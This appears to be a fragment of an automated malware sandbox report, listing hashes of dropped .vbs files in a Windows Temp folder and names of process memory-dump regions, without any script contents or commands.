MD5 c652fe464282dffd05bb658b768c1c50
SHA1 d1e30a0c4b11bc909d6cdcc07f65cfc0c1389edd
SHA256 01f2dfbd7c46398e82d2d4674b2dbb644c3f46bbcaf39e56a374b0695e9d1930
SHA512 38a3954ffdd79d8ed34201db2a19f4777adfdaf7ab4bdaeb32eb0b2c05fddddc1f27ba99f1e9fea4842e7cc1487c470e2150e1ca410eb57a9fc3c324f9e9d100

C:\Users\Admin\AppData\Local\Temp\f35d6936-9a7b-40ae-b481-da287ac57f8b.vbs

MD5 689266009311fc966895383347a45ceb
SHA1 4b5df90346066b983f4c180e920e726534daabd6
SHA256 e9a66b5ff7e323e45476350f2dc5149d02243d9568c8383cc4ef4ddf0dd0f865
SHA512 effca4b4787e16cced90a422ae88c4d6b5f1f35f28e8757c6434dd567a7a859027d46d5105e024fecb1fbb0453115c5af189860521e52b1699e1959a37351207

memory/964-477-0x000000001CD30000-0x000000001CE32000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SppExtComObj.exe.log

MD5 4a667f150a4d1d02f53a9f24d89d53d1
SHA1 306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97
SHA256 414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd
SHA512 4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

memory/5784-480-0x0000000002AB0000-0x0000000002AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ce590d51-0cb2-44dc-8e65-121e8153d484.vbs

MD5 0d169f9bb0aff6d99ec9eebdec709bfc
SHA1 406450b698341f66c531c26fde3331023d5009ea
SHA256 597275e2ade08cbae6ca7dbbe48dcadd0f0d09a02401309e4e91e12fe85df97f
SHA512 39f133895d56476a480b9a4a1ac3c53c4beee51906db83d25ada21e08677727754ee383373386d79ee421943523377d85c746cd9b8fc5a8aa58ef48ad8e82f53

memory/1820-507-0x00000000032E0000-0x00000000032F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\148a01bf-bd23-4ec9-9c42-b1618ecd5007.vbs

MD5 3c68cf171484f2e02153f0f85474f594
SHA1 804364ffe7cab1cbe575bd35cd2419023e7f7176
SHA256 69dd882463cf3396e02fca07ccd8c2610e27b6ea515f517806b566d521159963
SHA512 5d18bcf8d1b2a90d731565ba2b93ea19b72da4092aabe3c8da8dc5bc0ba1304df2a3a5f1c8047e6953fcbae50d64fadeb9566360c125f0e45c1146a604bcf815

C:\Users\Admin\AppData\Local\Temp\f723110b-7234-47ef-b0d7-4c1089c6d9e6.vbs

MD5 683f8bb565d3135f478669229b142663
SHA1 20ad319cefe5567514c922e771b0db9c885d6fe7
SHA256 b09defdac30ce21b1b06d98e57595ed69d55c54b79135c65c8f4d9d56bc265e5
SHA512 31571158178e7567a56c1b3a16c26100b9acc5adea1ce1be789bba5184141422e9a16c951daa066308a9ae2c0a6a6f0b301b063e5a804dd568f1e76808f7dbbf

memory/2564-560-0x000000001B960000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f0827014-d545-4ea1-992f-a56136e1993a.vbs

MD5 fbe2834ae93dd806f0a62679a4170c9f
SHA1 4da65b856bec741e4dcf8c91d93e2b6c41a93169
SHA256 c1581a76477b322000faf923068509bff87fe55d82e002c8fb24c7cce96dda0b
SHA512 3dc33406da28612499a1d4d5b12a30cb12e1ec4c45df9b71b15f9eef5d1082c67b2f5f45ed409b21d194c5ff93d63f8f415a30764315a6ae39eeb34de4374ce3

memory/2564-579-0x000000001CEC0000-0x000000001CFC2000-memory.dmp

memory/5696-596-0x000000001CB70000-0x000000001CC72000-memory.dmp

memory/6140-617-0x000000001C870000-0x000000001C972000-memory.dmp

memory/1388-634-0x000000001C2B0000-0x000000001C3B2000-memory.dmp

memory/2064-651-0x000000001D560000-0x000000001D662000-memory.dmp

memory/4384-668-0x000000001BD10000-0x000000001BE12000-memory.dmp